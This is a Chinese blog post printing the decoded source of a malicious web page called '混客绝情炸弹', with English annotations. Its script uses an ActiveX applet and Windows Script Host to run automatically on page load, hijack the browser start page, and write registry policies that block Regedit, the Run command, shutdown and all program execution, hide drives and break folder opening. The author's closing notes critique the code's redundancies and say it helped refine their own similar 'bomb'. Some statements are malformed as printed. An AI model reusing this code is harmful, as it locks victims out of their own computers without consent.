混客绝情炸弹的源代码

几个月前,发现一个好东西,据说是“混客绝情炸弹”的源代码,下载之后一看,是加密过的代码!当时手头还有其他事情,没顾上看。前几天没事,又把那段代码翻出来看了一下,现在就讲一下其中修改注册表项的代码含义,至于其他JS代码不做介绍。
源代码如下:
-----------------------------------------------------
<script language=javascript>
<!--
// Words holds the page payload. The article says the downloaded copy was encoded; here the value
// appears already decoded, so the markup and script that follow sit inside the string literal as
// plain text. As printed (nested quotes, wrapped literals) the listing is an annotated sample,
// not runnable code.
var Words ="<meta http-equiv="Content-Language" content="zh-cn">
<script>
// Code that writes to the registry.
// The zero-size applet written below loads com.ms.activeX.ActiveXComponent; f() reaches it through
// document.applets[0] and uses it to create COM objects by CLSID from inside the page.
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
document.write("<h1>世上本无情,庸人自扰之。。。。。</h1>");
// f(): creates three COM objects through the ActiveXComponent applet, then issues a series of
// RegWrite calls on the first one (Shl) that change the Internet Explorer start page, set
// Explorer/System policy values that lock down the desktop, and alter logon and clock text.
// Every path, success or failure, ends by writing the same red page, so the visitor gets no
// error indication.
//
// Reading notes for defenders:
//  - The indicators are the registry value names below (Policies//Explorer, Policies//System,
//    Policies//WinOldApp, Winlogon LegalNotice*, Run / RunServices, the .reg class default,
//    Control Panel//International). The listing prints paths with `//` separators; when hunting
//    on a host, look for the same key and value names in the registry itself.
//  - DisableRegistryTools, RestrictRun and the .reg remap together presumably remove the usual
//    in-session ways of undoing these values; the article's own remarks note that .reg files
//    cannot be opened once all programs are blocked.
//  - This depends on the browser letting an applet instantiate COM objects
//    (com.ms.activeX.ActiveXComponent); NOTE(review): presumably legacy Internet Explorer with
//    the Microsoft Java VM only - confirm before assessing exposure.
function f()
{
try
{
// Preparation for the registry writes: obtain COM objects by CLSID.
// The three CLSIDs are those of the Windows Script Host shell object, Scripting.FileSystemObject
// and the Windows Script Host network object, matching the names Shl, FSO and Net.
// FSO and Net are assigned but not used anywhere in this function.
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
// The registry modifications start here.
try
{
// Change the Internet Explorer start page (the URL string is printed with a leading space).
Shl.RegWrite ("HKCU//Software//Microsoft//Internet Explorer//Main//Start Page", " http://ok989.ok999.net");
// Disable Start > Run.
Shl.RegWrite
("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer
//NoRun", 01, "REG_BINARY");
// Disable Start > Shut Down.
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer
//NoClose", 01, "REG_BINARY");
// Disable Start > Log Off.
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer
//NoLogOff", 01, "REG_BINARY");
// Hide drives (in effect all of them): 67108863 is 2^26 - 1, i.e. one bit set for each of the
// 26 drive letters.
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer
//NoDrives", "67108863", "REG_DWORD");
// Block editing the registry with Regedit.exe.
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//System//
DisableRegistryTools", "00000001", "REG_DWORD");
// Hide the desktop icons.
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoDesktop","00000001","REG_DWORD");
// Disable MS-DOS compatible programs.
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//
Policies//WinOldApp//Disabled", "00000001", "REG_DWORD");
// Remove the "Restart the computer in MS-DOS mode" choice from Start > Shut Down.
Shl.RegWrite
("HKCU//Software//Microsoft//Windows//CurrentVersion//
Policies//WinOldApp//NoRealMode", "00000001", "REG_DWORD");
// Change the dialog shown at system start-up (legal notice caption and text).
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//
Winlogon//LegalNoticeCaption", "★魔界鬼域★");
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//
Winlogon//LegalNoticeText", "★天地无情。死不瞑目★");
// "Adds a start-up item, useless" (original author's note).
// NOTE(review): the data written is an empty string, so this presumably blanks an existing
// RunServices entry named SchedulingAgent rather than adding a working one - confirm.
Shl.RegWrite ("HKEY_LOCAL_MACHINE//Software//Microsoft//Windows//CurrentVersion//
RunServices//SchedulingAgent","","REG_SZ");
// Prevent user settings from being saved.
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoSaveSettings",01,"REG_BINARY");
// Disable the right-click menu on the desktop, drives and folders.
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoViewContextMenu",01,"REG_BINARY");
// Disable the right-click menu on the taskbar.
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoTrayContextMenu",01,"REG_BINARY");
// "Adds a start-up item, useless" (original author's note).
// NOTE(review): again an empty string, so presumably it blanks an existing Run entry named
// ScanRegistry - confirm.
Shl.RegWrite ("HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//
Run//ScanRegistry","","REG_SZ");
// Prevent folders from being opened: the open and explore ddeexec commands of the Folder class
// are overwritten with a string that starts with "rem".
Shl.RegWrite ("HKEY_CLASSES_ROOT//Folder//shell//open//ddeexec//"
,"rem [ViewFolder(%l, %I, %S)]","REG_SZ");
Shl.RegWrite ("HKEY_CLASSES_ROOT//Folder//shell//explore//ddeexec//"
,"rem [ViewFolder(%l, %I, %S)]","REG_SZ");
// Purpose unknown (original author's note). As printed, the key string is never closed, so
// this statement is malformed.
Shl.RegWrite ("HKEY_CLASSES_ROOT//CLSID//{01E04581-4EEE-11d0-BFE9-00AA005B4383},"rem [ViewFolder(%l, %I, %S)]","REG_SZ");
// Purpose unknown (original author's note). Malformed as printed, like the statement above.
Shl.RegWrite ("HKEY_CLASSES_ROOT//CLSID//{01E04581-4EEE-11d0-BFE9-00AA005B4383},"REG_SZ");
// Make .reg files open as text: the .reg class default is set to "txtfile", so a .reg file
// is handled as a text file.
Shl.RegWrite ("HKEY_LOCAL_MACHINE//Software//CLASSES//.reg//","txtfile","REG_SZ");
// Block every program from running (RestrictRun set to 1).
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//RestrictRun","00000001", "REG_DWORD");
// Purpose unknown (original author's note).
Shl.RegWrite ("HKEY_LOCAL_MACHINE//Enum//PCI//ChannelOptions",02,"REG_BINARY");
// Prevent the Internet Explorer window from being closed.
Shl.RegWrite ("HKCU//Software//Policies//Microsoft//Internet Explorer//Restrictions//NoBrowserClose","01", "REG_DWORD"); // Next call: disable "My Computer" > Properties > Device Manager.
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//System//NoDevMgrPage",1, "REG_DWORD");
// Disable the Control Panel.
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//
Explorer//NoSetFolders",1,"REG_DWORD");
// Disable Start > Find.
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoFind", "00000001", "REG_DWORD");
// Disable Start > Favorites.
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoFavoritesMenu", "00000001", "REG_DWORD");
// Disable Start > Documents.
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoRecentDocsMenu", "00000001", "REG_DWORD");
// Disable the taskbar properties dialog.
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoSetTaskbar", "00000001", "REG_DWORD");
// Change the clock text: the time format gains the "tt" marker, and both marker strings
// (s1159 and s2359) are replaced with a slogan.
// NOTE(review): the s1159 path is printed as "ControlPanel" without the space, unlike the two
// neighbouring paths; when triaging, check for a stray key of that name as well.
Shl.RegWrite ("HKEY_CURRENT_USER//Control Panel//International//stimeformat","HH:mm:ss tt","REG_SZ");
Shl.RegWrite ("HKEY_CURRENT_USER//ControlPanel//International//s1159"
,"★绝情魔界★","REG_SZ"); Shl.RegWrite ("HKEY_CURRENT_USER//Control Panel//International//s2359","★绝情魔界★","REG_SZ");
// End of the registry writes.
document.write("<body bgcolor=#FF0000>");
document.write("<h1>天地无情。死不瞑目</h1>");
}
catch(e)
{
// A failed registry write is swallowed; the page shown differs only by the trailing "!".
document.write("<body bgcolor=#FF0000>");
document.write("<h1>天地无情。死不瞑目!</h1>");
}
}
catch(e)
{
// Failure to obtain the applet or the COM objects is swallowed too; the same page is written.
document.write("<body bgcolor=#FF0000>");
document.write("<h1>天地无情。死不瞑目</h1>");
}
}
// clean(): schedules f() to run 1000 ms later. setTimeout is given the string "f()", which the
// browser evaluates as code when the timer fires.
function clean()
{
setTimeout("f()", 1000);
}
// Invoked as soon as this script is parsed, so the registry routine runs about one second after
// the decoded payload is written into the page, with no user action.
clean();
</script>
<SCRIPT LANGUAGE="javascript">
<!-- Begin
// Re-opens the current URL in a new window when the window's name does not match `fullscreen`.
// In this listing `fullscreen` and `scrollbars` appear as bare identifiers, not string literals.
if (this.name!=fullscreen)
{
window.open(location.href,fullscreen,fullscreen,scrollbars)
}
// End -->
</script>
<body bgcolor="#FF0000">
<p><b><font size="7" face="华文彩云">
</font></b></p>
<p><b><font face="华文彩云" size="7">
抽刀断水,水更流。</font></b></p>
<p><font face="华文彩云"><font size="7"><b>
举杯消愁,愁更愁</b></font><b><font size="7">。</font></b></font></p>"
// Decode the original payload.
// SetNewWords(): passes Words through unescape() and writes the result into the document, so the
// payload markup and script become part of the page only at this point. According to the article
// the delivered copy was encoded, so a static look at such a page would show an escaped string
// literal followed by unescape() and document.write() instead of the registry code itself.
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
// Runs immediately when the outer script is parsed.
SetNewWords();
// -->
</script>
-----------------------------------------------------
下面再来说一下我对这段代码的看法,从头说起吧:
1.代码中有2次添加了无用的启动项,没有任何意义。
2.由于代码中禁止了所有程序运行(十分歹毒),reg文件和inf文件是无法打开的,因此无须更改reg和inf文件的类型,这2项成为多余的代码(这是我以前测试"极恶万花谷"时发现的小Bug吧)。另外,禁止MS-DOS兼容程序也成为多余的代码。
3.禁止保存用户设置,感觉没什么用处,可以去掉。
4.禁用设备管理器,禁止收藏夹,禁止文档似乎是无用之举,看不出有什么意义。
5.禁止关闭计算机,再禁止"重新启动计算机并切换到MS-DOS方式"也就显得多余了。
6.其中有2项我不明白其中的含义,不过感觉也是没有实际意义的多余代码。
7.值得一提的是,第一个添加启动项的代码中使用了注册表主键的全称,即"HKEY_LOCAL_MACHINE"。这是我第一次看到这样修改注册表(对我修正我的"极恶万花谷"有很大帮助),以前看到的都是缩写,即HKEY_LOCAL_MACHINE=HKLM,HKEY_CURRENT_USER=HKCU。